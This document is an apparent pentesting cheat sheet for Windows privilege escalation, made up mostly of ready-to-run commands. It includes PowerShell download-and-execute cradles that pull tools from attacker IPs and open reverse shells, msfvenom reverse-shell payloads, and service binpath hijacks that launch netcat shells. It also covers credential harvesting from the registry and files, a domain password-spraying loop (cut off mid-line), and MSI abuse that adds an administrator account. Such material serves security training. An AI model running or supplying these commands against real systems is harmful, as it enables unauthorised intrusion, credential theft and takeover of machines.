Contents
Pretty much where I have pulled most of this content.
1 2 3 4 |
# Simple Powershell Command powershell -command ("whoami") |
1 2 3 4 |
# Download a file (Similar to Linux's WGET) powershell -command (new-object System.Net.WebClient).DownloadFile('http://10.10.14.19:1234/rottenpotato.exe','C:\Users\Public\potato.exe') |
1 2 3 |
powershell -c 'IEX(New-Object Net.WebClient).DownloadString(“http://<ip_address>/full_path/script_name.ps1”)' |
1 2 3 4 5 6 7 8 9 |
# You have a cmd.exe shell but want a powershell: ## Start a Python HTTP Server in Nishang/Shells powershell -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.19/Invoke-PowerShellTcp.ps1','C:\Users\Public\Invoke-PowersShellTcp.ps1') # Now that you have downloaded the file, we need to import and execute: powershell -exec bypass -c Import-Module .\Invoke-PowerShellTcp.ps1;Invoke-PowerShellTcp -Reverse -IPAddress 192.168.56.104 -Port 443 |
One Liner Reverse Powershell from CMD:
1 2 3 |
powershell -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(“http://192.168.56.104/Invoke-PowerShellTcp.ps1”);Invoke-PowerShellTcp -Reverse -IPAddress 192.168.56.104 -Port 443 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
# Basic Queries hostname whoami echo %USERNAME% net users net users <username> net localgroups net group /domain netstat -ano netsh firewall show state # How well is the system Patched: wmic qfe get Caption,Description,HotFixID,InstalledOn # Scheduled Tasks Query schtasks /query /fo LIST /v tasklist /SVC # Show all started Windows Services: net start # Check for 3rd party Drivers: DRIVERQUERY |
Powerview.ps1 – Queries the Domain Controller and attempts to check if you (current Windows user) have admin privileges on other hosts. If so, we can psexec to get Admin.
1 2 3 4 5 |
powershell -exec bypass import-module powerview.ps1 Find-LocalAdminAccess |
1 2 3 4 5 6 7 8 |
# How to import and use PETools from Powersploit ## Easiest way to move data is via a Python HTTP server to ## get all of the data in the PETools Directory to the Victim. Import-Module PETools.psd1 Get-Command -Module PETools |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
# Check for password string: findstr /si password *.txt | *.xml | *.ini dir /s *pass* == *cred* == *vnc* == *.config* findstr /spin "password" *.* findstr /spin "password" *.* # Check for common password files: dir /b /s web.config dir /b /s unattend.xml dir /b /s sysprep.inf dir /b /s sysprep.xml dir /b /s *pass* |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
# Search for Autologin Credentials: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Search for VNC Password: reg query "HKCU\Software\ORL\WinVNC3\Password" # Search for Putty Creds: reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Search for passwords in HKLM: reg query HKLM /f password /t REG_SZ /s | clip # Search for passwords in HKCU: reg query HKCU /f password /t REG_SZ /s | clip |
1 2 3 4 5 6 7 |
# Look for local services that are listening: netstat -ano # Port forward using plink: plink.exe -l root -pw mysecretpass 192.168.0.10. -R 8080:127.0.0.1:8080 |
Github Repository is linked above but, if you’re lazy, here it is again.
On Windows Host:
systeminfo > systeminfo.txt
Transfer the file back to kali to be run against the python exploit suggester.
On Kali host:
1 2 3 4 5 6 7 |
# Update the database: python windows-exploit-suggester.py -u # Use the new database against the systeminfo.txt python windows-exploit-suggester.py -d 2018-08-21-mssb.xls -i systeminfo.txt |
This command can be used locally to get System privileges since the at system executes commands as system.
1 2 3 4 5 6 7 |
# Generate an evil binary: msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=443 -f exe > shell.exe # Move binary to Windows and add to at: at 13:20 /interactice shell.exe |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
# Look for tasks that are run by a privileged user and run a binary that we can overwrite: schtasks /query /fo LIST /v # Copy and paste into a linux terminal and look for System: cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM # Check the binpath to your evil binary: sc config upnphost binpath= "C:\Inetpub\nc.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe" sc config upnphost obj= ".\LocalSystem" password= "" sc config upnphost depend= "" # Restart the service: wmic service NAMEOFSERVICE call startservice ## OR: net stop [service name] && net start [service name] |
It happens when a developer fails to enclose the file path in quotes if that path has a space. File paths that are properly quoted are treated as absolute and therefore mitigate this vulnerability.
So if we find a file without quotes, like below, it’s vulnerable:
C:\Program Files\Some Folder\1\Service.exe
Windows would try to execute:
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
So if we have write access on some target directory we can write a file on that directory:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
# Check for vulnerable programs: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ icacls “C:\Program Files\Some Folder” sc query sc query <service_name> # Generate Payload: msfvenom -p windows/shell_reverse_tco -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe # Change Binary Path: sc config <service_name> binpath= "C:\shell.exe" # Reboot or restart service: shutdown /r /t 0 sc <servicename> stop & sc <servicename> start ## OR wmic service NAMEOFSERVICE call startservice ## OR: net stop [service name] && net start [service name] |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
# WMIC - we try this first: wmic service list brief # Get a list of services and store to file: for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt # Check the permissions on the list of services: for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt # SC.EXE - we try this second: sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt FOR /F %i in (Servicenames.txt) DO echo %i type Servicenames.txt FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt ## This will give us the paths, we can not run cacls "path" on each of them. # Check for Service Permissions by Auth-Type: Accesschk.exe -uwcqv “Authenticated Users” * Accesschk.exe -uwcqv “Users” * Accesschk.exe -uwcqv “Everyone” * # If you find one that has weak permissions: Accesschk.exe ucqv <Service_Name> sc qc <service_name> #We might be able to overwrite the binary the service is pointing to. sc stop upnp.exe sc config upnp.exe binpath= “net user lokii lokii /add” sc start upnp.exe net user #Check to see if the user has been added to host machine. |
1 2 3 4 5 |
Accesschk.exe -uwcqv “Authenticated Users” * Accesschk.exe -uwcqv “Users” * Accesschk.exe -uwcqv “Everyone” * |
1 2 3 |
cacls "c:\Program Files" /T | findstr Users |
This setting installs all .msi packages with system privileges for everyone.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
# REG_DWORD 0x01 signifies that yes, AlwaysInstall Elevated is set and on reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer \v AlwaysInstallElevated # REG_DWORD 0x01 signifies that yes, AlwaysInstall Elevated is set and on reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer \v AlwaysInstallElevated #---------------------------------------------------# # Initial MSI Payload: # #---------------------------------------------------# # If the bit is set then we: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.101 lport=443 –f msi > shell.msi # Upload the shell to the Windows host using whatever method tickles your fancy and run: msiexec /quiet /qn /i 1.msi #----------------------------------------------------# # Secondary MSI Payload: # #----------------------------------------------------# # We add a user in windows and create a secondary payload to add to administrators: net user lokii lokii /add msfvenom -p windows/exec CMD='net localgroup administrators lokii /add' -f msi > upgrade.msi |
/quiet = Suppress any messages to the user during installation
/qn = No GUI
/i = Regular (vs. administrative) installation
A loop that iterated over all the users in users.txt and tries all the passwords listed in
pass.txt . Can be used with the net user /domain command listed above for every user in the domain.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
# Get a list of users: net user /domain > users.txt # Run the following script: @FOR /F %n in (users.txt) DO @FOR / F %p in (pass.txt) DO @net use \\[DOMAINCONTROLLER]\IPC$ /user:[DOMAIN]\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\[DOMAINCONTROLLER]IPC$ > NULL # Example: net user /domain > DomainUsers.txt echo "Password1" >> pass.txt echo "1q2w3e4r" >> pass.txt @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\ |
Simply use a DLL written in C++ in which DLLMain contains malicious code or points to a malicious function in the code such as a shellcode loader or downloader/executor.
1 2 3 4 5 6 7 8 9 10 |
# Check to see if UPNPHOST is running and its dependencies sc qc upnphost # Attempt to overwrite the binpath: sc config upnphost binpath= "C:\evil.exe" sc config upnphost obj= ".\LocalStation" password= "" sc qc upnphost net start upnphost |
If you have a GUI with a user that is included in Administrators group you first need to open up cmd.exe
for the administrator. If you open up the cmd that is in Accessories it will be opened up as a normal user. And if you rightclick and do Run as Administrator
you might need to know the Administrators password. Which you might not know. So instead you open up the cmd from c:\windows\system32\cmd.exe
. This will give you a cmd with Administrators rights.
From here we want to become SYSTEM user. To do this we run:
First we check what time it is on the local machine:
1 2 3 4 5 6 |
time # Now we set the time we want the system CMD to start. Probably one minuter after the time. at 01:23 /interactive cmd.exe |
Get Psexec onto the system and run:
1 2 3 |
psexec -i -s cmd.exe |